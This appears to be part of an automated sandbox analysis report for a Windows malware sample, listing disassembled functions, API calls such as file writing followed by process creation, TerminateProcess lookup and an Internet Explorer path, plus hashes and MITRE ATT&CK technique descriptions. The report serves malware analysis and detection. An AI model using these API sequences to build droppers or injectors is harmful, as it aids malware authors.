CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,004244A3,00000000,?), ref: 004244C3
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,004244A3,00000000,?), ref: 004244F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,004244A3,00000000,?), ref: 004244FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,004244A3), ref: 00424523

Memory Dump Source

Source File: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: 561451de1182f26b83a4d0c89bf44bc0519aa6c32ef9bdd59d17316bb2afed01
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: DE11ADB1200616BBEB251B20DC4AFFB3A2CEFC4B01F004519FA0A89480DBF59E5086A9

Function 00401820 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ProcessTrans), ref: 0040182F

Strings

<6@, xrefs: 00401896
ProcessTrans, xrefs: 00401829
%u.%u.%u.%u, xrefs: 00401890

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: %u.%u.%u.%u$<6@$ProcessTrans
API String ID: 190572456-2997530932
Opcode ID: 923ab22f828fa07c49138cca62a50a6aac9a6e92c9ae45124c644abfdc677477
Instruction ID: 3a4176f581b1380518edbe1a1b49e1bd09d6b00a217a4bcfab538be4d270b979
Opcode Fuzzy Hash: 923ab22f828fa07c49138cca62a50a6aac9a6e92c9ae45124c644abfdc677477
Instruction Fuzzy Hash: E901A172414302AFD314DB24CD85E7B77A8EFC4704F048A3CF895A62D0DB78D9088B9A

Function 00403C10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403C20
lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C35
lstrcpyA.KERNEL32(?,?,?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C48

Strings

\Program Files\Internet Explorer\iexplore.exe, xrefs: 00403C2A

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: DirectorySystemlstrcatlstrcpy
String ID: \Program Files\Internet Explorer\iexplore.exe
API String ID: 2630975639-1907246925
Opcode ID: 9d610355a3853537af27de88a3b84bfec3623b09a142c4852019a6b4888a0da7
Instruction ID: 58d9aff6231955fab03da148272387ac6a18f6e7ddf61f3ccb84cd9a8b5690bb
Opcode Fuzzy Hash: 9d610355a3853537af27de88a3b84bfec3623b09a142c4852019a6b4888a0da7
Instruction Fuzzy Hash: 4FE086F4548340ABD710D754D948FAA77A4BB94305F45882CB5CDD2190D6B8809CC71A

Function 004044FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,TerminateProcess), ref: 0040451A
GetProcAddress.KERNEL32(00000000), ref: 00404521

Strings

TerminateProcess, xrefs: 00404510
kernel32.dll, xrefs: 00404515

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: TerminateProcess$kernel32.dll
API String ID: 2574300362-189552057
Opcode ID: 6f636aeb74e389af04e2a293c086324e8f42b9283dc5f0b57c6f061e2f8a9beb
Instruction ID: 033c7f9598048c8c3c56f6b884b3fb58df83f6f11900fedc1394fc5852d01883
Opcode Fuzzy Hash: 6f636aeb74e389af04e2a293c086324e8f42b9283dc5f0b57c6f061e2f8a9beb
Instruction Fuzzy Hash: 78C012B2681300AAC2806BA0BE08A643710A285A2A320103BF602B00E0CA3A00208B2D

Function 00402890 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 004028F5
Sleep.KERNEL32(000001F4), ref: 00402947
Sleep.KERNEL32(000001F4), ref: 0040299A

Strings

X7@, xrefs: 00402895

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: X7@
API String ID: 3472027048-2067089342
Opcode ID: 92fada5cfdbc6a922edbaf3abd6bdbc867ed69b1f2908b021d67a98f8e651ac5
Instruction ID: 56058c761996469b055373d7f4e5675fd511cabc212af0c966289d5b43759b51
Opcode Fuzzy Hash: 92fada5cfdbc6a922edbaf3abd6bdbc867ed69b1f2908b021d67a98f8e651ac5
Instruction Fuzzy Hash: EE21F9B12982129BDB00DF71EF08B5A3B66A7D8745F10843EE184762E4CFB95445CFAC

Function 7FE31079 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(03A0FB94), ref: 7FE310E8
GetProcAddress.KERNEL32(00000000,7FE31181), ref: 7FE310F3

Strings

.DLL, xrefs: 7FE310DE

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction ID: 5900f217701f080c4111b40af2f692126b674fcdb3668acd741284d8170f4144
Opcode Fuzzy Hash: 5fdbe1fdb9a291c56d0de1b0085fc354e7c21eb32f0bc32c042edfe8f07510ff
Instruction Fuzzy Hash: B301C835D00584EBC7659F38C54DADF3B7BEF08266F800118E5268A455C6F8DA90CFA1

Function 006210CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0390FA58), ref: 0062113D
GetProcAddress.KERNEL32(00000000,006211D6), ref: 00621148

Strings

.DLL, xrefs: 00621133

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction ID: e7eacefbbe85ef6b3bee5713e82fc3bf577c7ddb6905f9b8c12ca08ac2adc72a
Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction Fuzzy Hash: 2501C83060F820FADF648E6CE84D7EA3B6EEF26341F104114DA198F256C7708E618E95

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
